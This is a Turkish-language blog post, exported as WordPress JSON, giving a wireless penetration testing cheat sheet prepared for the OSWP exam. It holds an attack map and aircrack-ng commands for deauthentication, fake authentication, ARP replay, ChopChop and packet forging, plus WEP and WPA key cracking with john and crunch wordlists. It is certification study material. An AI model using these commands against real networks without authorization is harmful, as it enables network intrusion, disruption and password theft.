{"id":1082,"date":"2021-05-13T17:34:20","date_gmt":"2021-05-13T17:34:20","guid":{"rendered":"http:\/\/144.76.171.171\/blog\/?p=1082"},"modified":"2021-05-13T23:44:57","modified_gmt":"2021-05-13T23:44:57","slug":"wireless-pentest-cheat-sheet","status":"publish","type":"post","link":"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/05\/13\/wireless-pentest-cheat-sheet\/","title":{"rendered":"Wireless Penetration Testing #Cheat Sheet"},"content":{"rendered":"<p>Asl\u0131nda bu cheat sheet'i OSWP s\u0131nav\u0131m i\u00e7in haz\u0131rlad\u0131m ama tabikide geli\u015ftirmeye devam edip, Wireless Testlerinde de kullanabilece\u011fim bir duruma yava\u015f yava\u015f getirece\u011fim. Ancak \u015fu haliyle bile g\u00fczel bir cheat sheet oldu\u011funu d\u00fc\u015f\u00fcn\u00fcyorum. \u00d6zellikle lab ortam\u0131nda b\u00f6yle bir cheat sheet \u00e7ok i\u015finize yarayacakt\u0131r. Hadi ba\u015flayal\u0131m!<\/p>\n<p>\u00d6ncesinde OSWP i\u00e7in Attack Map'imizi olu\u015ftural\u0131m. Evet bu sayfay\u0131 olu\u015ftururken olduk\u00e7a <a href=\"https:\/\/github.com\/brcyrr\" title=\"Burcu Yarar\">Burcu Yarar<\/a>'dan esinlendim.<\/p>\n<h3>Attack Map<\/h3>\n<pre><code class=\"language-sh\">WEP mi, WPA\/WPA2 mi?\n- WEP\n- - Open Authentication mu Shared Key Authentication mu?\n- - - Open Authenticaton\n- - - - Herhangi bir client a\u011fa ba\u011fl\u0131 m\u0131?\n- - - - - Evet, ba\u011fl\u0131:\n- - - - - - # Arp Request Replay Sald\u0131r\u0131s\u0131\n- - - - - - # Interactive Packet Replay Sald\u0131r\u0131s\u0131\n- - - - - Hay\u0131r, ba\u011fl\u0131 de\u011fil:\n- - - - - - # Korek ChopChop Sald\u0131r\u0131s\u0131\n- - - - - - # Fragmentation Attack\n- - - Shared Key Authenticaton\n- - - - Herhangi bir client a\u011fa ba\u011fl\u0131 m\u0131?\n- - - - - Evet, ba\u011fl\u0131:\n- - - - - - # Fake Shared Key Authentication Sald\u0131r\u0131s\u0131\n- - - - - - # Arp Request Replay Sald\u0131r\u0131s\u0131\n- - - - - Hay\u0131r, ba\u011fl\u0131 de\u011fil:\n- - - - - - Client bekle...\n\n- WPA\/WPA2\n- - Herhangi bir client a\u011fa ba\u011fl\u0131 m\u0131?\n- - - Evet, ba\u011fl\u0131:\n- - - - # 4&#039;l\u00fc el s\u0131k\u0131\u015fmay\u0131 yakala ve k\u0131r\n- - - Hay\u0131r, ba\u011fl\u0131 de\u011fil:\n- - - - Client bekle...<\/code><\/pre>\n<p>Not: Yukar\u0131daki Attack Map'i haz\u0131rlarken en son a\u015famada # ile belirtti\u011fim sald\u0131r\u0131 t\u00fcrlerini i\u00e7eren toplu komutlar bu yaz\u0131n\u0131n en alt\u0131nda yer almaktad\u0131r. Direkt bu ba\u015fl\u0131klarla ilgili komutlara gidebilirsiniz.<\/p>\n<hr>\n<h2>Yararl\u0131 Olabilecek Komutlar<\/h2>\n<p><strong>Yeni bir aray\u00fcz ekleme:<\/strong><\/p>\n<pre><code class=\"language-sh\">iw dev wlan0 interface add mon0 type monitor\nifconfig mon0 up<\/code><\/pre>\n<p><strong>Aray\u00fcz silmek:<\/strong><\/p>\n<pre><code class=\"language-sh\">iw dev mon0 interface del<\/code><\/pre>\n<p><strong>Monitor Mode:<\/strong><\/p>\n<pre><code class=\"language-sh\">airmon-ng start wlan0 1\n---------\niw dev wlan0 interface add mon0 type monitor\nifconfig mon0 up<\/code><\/pre>\n<p><strong>Mevcut frekans:<\/strong><\/p>\n<pre><code class=\"language-sh\">iwlist wlan0mon channel<\/code><\/pre>\n<p><strong>Mevcut MAC adresi:<\/strong><\/p>\n<pre><code class=\"language-sh\">macchanger wlan0mon -s<\/code><\/pre>\n<p><strong>airdecap-ng ile \u015fifreli paketleri a\u00e7mak:<\/strong><\/p>\n<pre><code class=\"language-sh\">airdecap-ng -w 0000000000 web-shared-01.cap\n---------\nairdecap-ng -e &#039;test&#039; -p &#039;mjdpPd4D&#039;  wpa2-01.cap -b &#039;7A:2B:C1:63:BD:64&#039;<\/code><\/pre>\n<p><strong>Fake Authentication:<\/strong><\/p>\n<pre><code class=\"language-sh\">aireplay-ng -1 0 -e &lt;ESSID&gt; -a &lt;AP MAC&gt; -h &lt;Your MAC&gt; &lt;interface name&gt;<\/code><\/pre>\n<p><strong>Shared Key Fake Authentication:<\/strong><\/p>\n<pre><code class=\"language-sh\">aireplay-ng -1 0 -e &lt;ESSID&gt; -y &lt;sharedkey&gt; -a &lt;AP MAC&gt; -h &lt;Your MAC&gt; &lt;interface&gt;<\/code><\/pre>\n<p><strong>ARP Request Replay Sald\u0131r\u0131s\u0131:<\/strong><\/p>\n<pre><code class=\"language-sh\">aireplay-ng -3 -b &lt;AP MAC&gt; -h &lt;Source MAC&gt; &lt;interface name&gt;<\/code><\/pre>\n<p><strong>Deauthentication Sald\u0131r\u0131s\u0131:<\/strong><\/p>\n<pre><code class=\"language-sh\">aireplay-ng -0 1 -a &lt;AP MAC&gt; -c &lt;Client MAC&gt; &lt;interface name&gt;\n---------\naireplay-ng -0 1 -a &lt;AP MAC&gt; &lt;interface name&gt;<\/code><\/pre>\n<p><strong>Bir ARP Request paketi olu\u015fturmak:<\/strong><\/p>\n<pre><code class=\"language-sh\">packetforge-ng -0 -a &lt;AP MAC&gt; -h &lt;Your MAC&gt; -k &lt;Dest IP&gt; -l &lt;Source IP&gt; -y &lt;xor file&gt; -w &lt;output file&gt;<\/code><\/pre>\n<p><strong>Aireplay-ng ile KoreK ChopChop sald\u0131r\u0131s\u0131:<\/strong><\/p>\n<pre><code class=\"language-sh\">aireplay-ng -4 -b &lt;AP MAC&gt; -h &lt;Source MAC&gt; &lt;interface&gt;<\/code><\/pre>\n<p><strong>Interactive Packet Replay Sald\u0131r\u0131s\u0131:<\/strong><\/p>\n<pre><code class=\"language-sh\">aireplay-ng -2 -r &lt;packet filename&gt; &lt;interface&gt;<\/code><\/pre>\n<hr>\n<h2>Attack Map \u0130\u00e7in Olu\u015fturulmu\u015f Komutlar<\/h2>\n<p><strong>Cracking WEP Without Client - #KoreK ChopChop Sald\u0131r\u0131s\u0131:<\/strong><\/p>\n<pre><code class=\"language-sh\">airodump-ng wlan0mon --bssid &lt;AP MAC&gt; -c &lt;AP CHANNEL&gt; -w ChopChop\naireplay-ng -1 6000 -o 1 -q 10 -e &lt;ESSID&gt; -a &lt;AP MAC&gt; -h &lt;Your MAC&gt; &lt;interface name&gt;\naireplay-ng -4 -b &lt;AP MAC&gt; -h &lt;Source MAC&gt; &lt;interface&gt;\npacketforge-ng -0 -a &lt;AP MAC&gt; -h &lt;Your MAC&gt; -k &lt;Dest IP&gt; -l &lt;Source IP&gt; -y &lt;xor file&gt; -w &lt;output file&gt;\naireplay-ng -2 -r &lt;packet filename&gt; &lt;interface&gt;\naircrack-ng ChopChop-01.cap<\/code><\/pre>\n<p><strong>Cracking WEP With Client - # Arp Request Replay Sald\u0131r\u0131s\u0131:<\/strong><\/p>\n<pre><code class=\"language-sh\">airodump-ng wlan0mon --bssid &lt;AP MAC&gt; -c &lt;AP CHANNEL&gt; -w webWithClient\naireplay-ng -1 0 -e &lt;ESSID&gt; -a &lt;AP MAC&gt; -h &lt;Your MAC&gt; &lt;interface name&gt;\naireplay-ng -3 -b &lt;AP MAC&gt; -h &lt;Source MAC&gt; &lt;interface name&gt;\naireplay-ng -0 1 -a &lt;AP MAC&gt; &lt;interface name&gt;\naircrack-ng webWithClient-01.cap<\/code><\/pre>\n<p><strong>Cracking WEP via a Client - # Interactive Packet Replay Sald\u0131r\u0131s\u0131:<\/strong><\/p>\n<pre><code class=\"language-sh\">aireplay-ng -1 6000 -o 1 -q 10 -e &lt;ESSID&gt; -a &lt;AP MAC&gt; -h &lt;Your MAC&gt; &lt;interface name&gt;\nairodump-ng wlan0mon --bssid &lt;AP MAC&gt; -c &lt;AP CHANNEL&gt; -w webViaClient\naireplay-ng -2 -a &lt;bssid MAC address&gt; -d FF:FF:FF:FF:FF:FF -m 68 -n 68 -t 1 -f 0 &lt;interface&gt;\naircrack-ng webViaClient-01.cap<\/code><\/pre>\n<p><strong>WEP Shared Key Authentication Attack - # Fake Shared Key Authentication Sald\u0131r\u0131s\u0131:<\/strong><\/p>\n<pre><code class=\"language-sh\">airodump-ng -c &lt;AP channel&gt; --bssid &lt;AP MAC&gt; -w &lt;capture&gt; &lt;interface&gt;\naireplay-ng -0 1 -a &lt;AP MAC&gt; -c &lt;Client MAC&gt; &lt;interface&gt;\naireplay-ng -1 0 -e &lt;ESSID&gt; -y &lt;keystream file&gt; -a &lt;AP MAC&gt; -h &lt;Your MAC&gt; &lt;interface&gt;\naireplay-ng -3 -b &lt;AP MAC&gt; -h &lt;Your MAC&gt; &lt;interface&gt;\naireplay-ng -0 1 -a &lt;AP MAC&gt; -c &lt;Client MAC&gt; &lt;interface&gt;\naircrack-ng &lt;capture&gt;<\/code><\/pre>\n<hr>\n<h2>Ekstra<\/h2>\n<p><strong>Cracking WPA via Airolib-ng:<\/strong><\/p>\n<pre><code class=\"language-sh\">echo wifu &gt; essid.txt\nairolib-ng wifu --import essid essid.txt\nairolib-ng wifu --stats\nairolib-ng wifu --import passwd \nairolib-ng &lt;db name&gt; --batch\naircrack-ng -r &lt;db name&gt; &lt;capture&gt;<\/code><\/pre>\n<p><strong>Cracking WPA via John:<\/strong><\/p>\n<pre><code class=\"language-sh\">john --wordlist=\/usr\/share\/john\/password.lst --rules --stdout | aircrack-ng -w - john-01.cap -e Huawei_HG655d<\/code><\/pre>\n<pre><code class=\"language-sh\">john --wordlist=\/usr\/share\/john\/password.lst --rules --stdout --session=wpa | aircrack-ng -w - john-01.cap -e Huawei_HG655d\n#Session olarak kaydetti\u011fimizden aircrack-ng&#039;den \u00e7\u0131kt\u0131\u011f\u0131m\u0131zda --restore ile kald\u0131\u011f\u0131m\u0131z yerden k\u0131rmaya devam edebiliriz.\njohn --restore=wpa |aircrack-ng -w - john-01.cap -e Huawei_HG655d<\/code><\/pre>\n<p><strong>Crunch ile Dinamik Wordlist<\/strong><\/p>\n<pre><code class=\"language-sh\">crunch 8 8 12345678  | john --stdin --session=wpa --stdout | aircrack-ng -w - wpa-01.cap -b 7A:2B:C1:63:BD:64<\/code><\/pre>\n<pre><code class=\"language-sh\">crunch 8 8 12345678  | john --restore=wpa | aircrack-ng -w - wpa-01.cap -b 7A:2B:C1:63:BD:64<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Asl\u0131nda bu cheat sheet&#8217;i OSWP s\u0131nav\u0131m i\u00e7in haz\u0131rlad\u0131m ama tabikide geli\u015ftirmeye devam edip, Wireless Testlerinde de kullanabilece\u011fim bir duruma yava\u015f yava\u015f getirece\u011fim. Ancak \u015fu haliyle&#8230;<\/p>\n<div class=\"more-link-wrapper\"><a class=\"more-link\" href=\"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/05\/13\/wireless-pentest-cheat-sheet\/\">Devam\u0131n\u0131 oku<span class=\"screen-reader-text\">Wireless Penetration Testing #Cheat Sheet<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[36,382],"tags":[497],"class_list":["post-1082","post","type-post","status-publish","format-standard","hentry","category-cheat-sheet","category-wireless","tag-oswp","entry"],"_links":{"self":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1082","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/comments?post=1082"}],"version-history":[{"count":11,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1082\/revisions"}],"predecessor-version":[{"id":1099,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1082\/revisions\/1099"}],"wp:attachment":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/media?parent=1082"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/categories?post=1082"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/tags?post=1082"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}